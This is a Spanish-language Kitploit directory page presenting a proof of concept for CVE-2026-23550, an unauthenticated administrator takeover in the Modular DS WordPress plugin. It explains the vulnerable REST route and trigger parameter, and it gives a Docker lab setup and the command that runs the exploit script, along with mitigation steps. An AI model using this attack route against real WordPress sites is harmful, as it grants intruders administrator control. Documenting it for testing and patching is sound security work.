Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-23550-PoC — CVE-2026-23550 - Plugin de WordPress Modular DS **Acceso de Administrador No Autenticado** | Kitploit
Herramientas/GitHubGitHub/thetorjancaptain/cve-2026-23550-poc
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de PenetraciónAutenticación
GitHubthetorjancaptain/cve-2026-23550-poc

CVE-2026-23550-PoC

CVE-2026-23550 - Plugin de WordPress Modular DS **Acceso de Administrador No Autenticado**

Ver Repositorio
1hace 7 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-23550-PoC

CVE-2026-23550 - Plugin de WordPress Modular DS Acceso de Administrador No Autenticado

Status CVSS Affected

Prueba de Concepto (PoC) que demuestra CVE-2026-23550 - toma de control crítica de cuenta de administrador sin autenticación en el plugin de WordPress Modular DS (versiones ≤2.5.1). Explotado activamente en la naturaleza.

Flujo del PoC

Resumen del Ataque: El enrutamiento defectuoso de la API REST en /api/modular-connector/login omite la autenticación de WordPress cuando , otorgando cookies de sesión de administrador sin autenticación.

origin=mo

🚀 Demo Rápida - Si ya tienes WP configurado

root@kitploit:~
# PoC listo para producción
./CVE-2026-23550-PoC.sh http://target.com

Salida:

root@kitploit:~
[+] CVE-2026-23550 Modular Connector Exploit Test
[+] VULNERABLE: Cookie de sesión de administrador emitida

Nota Técnica:

El endpoint REST afectado es accesible exclusivamente a través del mecanismo ?rest_route=; el acceso directo mediante /wp-json/ puede no estar disponible. La vulnerabilidad permite acceso sin autenticación sin credenciales ni validación de nonce. La emisión exitosa de una cookie de sesión de administrador de WordPress constituye la confirmación de la explotación. Esta prueba de concepto no ejecuta ninguna acción administrativa. Se utiliza Modular DS versión 2.5.0 durante las pruebas.


⚙️ Pasos para Reproducir:

Paso 1: Directorio de laboratorio

root@kitploit:~
mkdir -p ~/Desktop/CVE-2026-23550/cve-poc-wp
cd ~/Desktop/CVE-2026-23550/cve-poc-wp

Paso 2: Docker Compose

root@kitploit:~
version: "3.9"

services:
  db:
    image: mysql:8.0
    restart: always
    environment:
      MYSQL_ROOT_PASSWORD: rootpass
      MYSQL_DATABASE: wordpress
      MYSQL_USER: wpuser
      MYSQL_PASSWORD: wppass
    volumes:
      - db_data:/var/lib/mysql

  wordpress:
    image: wordpress:6.4.3-php8.2-apache
    depends_on:
      - db
    ports:
      - "8080:80"
    restart: always
    environment:
      WORDPRESS_DB_HOST: db:3306
      WORDPRESS_DB_USER: wpuser
      WORDPRESS_DB_PASSWORD: wppass
      WORDPRESS_DB_NAME: wordpress
    volumes:
      - wp_data:/var/www/html

volumes:
  db_data:
  wp_data:

Paso 3: Desplegar

root@kitploit:~
docker compose up -d
docker compose logs -f db

Espera a: "ready for connections"

Paso 4: Instalación de WordPress

  • URL: http://localhost:8080
  • Usuario administrador: admin
  • Contraseña: admin123
  • Título del sitio: cualquier cosa

Paso 5: Verificar REST (IMPORTANTE)

root@kitploit:~
curl http://localhost:8080/?rest_route=/

Esperado:

root@kitploit:~
{
  "name": "...",
  "namespaces": [...]
}

Si esto falla → DETENTE, el entorno está roto.

Paso 6: Instalar el plugin vulnerable

root@kitploit:~
wget https://downloads.wordpress.org/plugin/modular-connector.2.5.0.zip
unzip modular-connector.2.5.0.zip

WORDPRESS_ID=$(docker compose ps -q wordpress)
docker cp modular-connector "$WORDPRESS_ID":/var/www/html/wp-content/plugins/

docker exec "$WORDPRESS_ID" chown -R www-data:www-data \
  /var/www/html/wp-content/plugins/modular-connector

Paso 7: Activar el plugin

  • http://localhost:8080/wp-admin/plugins.php
  • Activa Modular Connector
  • Ignora los avisos de incorporación

Paso 8: Explotación

root@kitploit:~
chmod +x CVE-2026-23550-PoC.sh
./CVE-2026-23550-PoC.sh http://localhost:8080/

Nota: Si quieres las cookies en un archivo de texto, elimina "rm -f "$COOKIE_JAR"" del archivo poc.sh.

🛡️ Mitigación

  • Inmediato: Desactivar el plugin Modular DS
  • Parche: Actualizar a 2.5.2+
  • Auditoría: Verificar si hay usuarios administradores no autorizados
  • WAF: Bloquear ?rest_route=/api/modular-connector/login

📄 Licencia

Licencia MIT - Solo para investigación de seguridad y pruebas de penetración autorizadas. No para uso malicioso. Divulga de manera responsable.

🚨 Aviso Legal

Este PoC es solo para pruebas de seguridad autorizadas. El uso no autorizado contra sistemas de producción es ilegal. Reporta los hallazgos a los mantenedores del plugin.

Descargar herramienta